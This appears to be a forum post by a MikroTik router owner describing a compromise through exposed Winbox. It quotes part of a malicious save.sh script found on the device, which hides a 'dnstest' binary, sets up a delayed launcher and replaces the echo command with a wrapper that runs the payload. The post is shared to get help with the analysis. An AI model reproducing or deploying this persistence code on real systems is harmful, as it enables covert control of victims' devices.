Router had only winbox 8129, ssh on the changed high port and pptp on the default port. Version 6.41.3
The password is random char + numbers + special chars and nowhere else used.
Login to my router:
I updated it to the latest version and downloaded it completely from the outside.
Fortunately, I found two files: save.sh and dnstest.
Maybe their content will help in something:
Code: Select all
case "$PATH" in
# old versions
if [ ! -d "/flash/" ]; then
if [ -f $dest/.dnstest ]; then
if [ -f $dest/echo ]; then
if [ -f $dest/.test ]; then
mkdir -p $dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest
echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test
echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
This is not the only case, this is log from my friend. He got only exposed winbox:
It looks like the first attempt to log in - here somewhere miraculously collects passwords from the router and later logging in with user perm = full.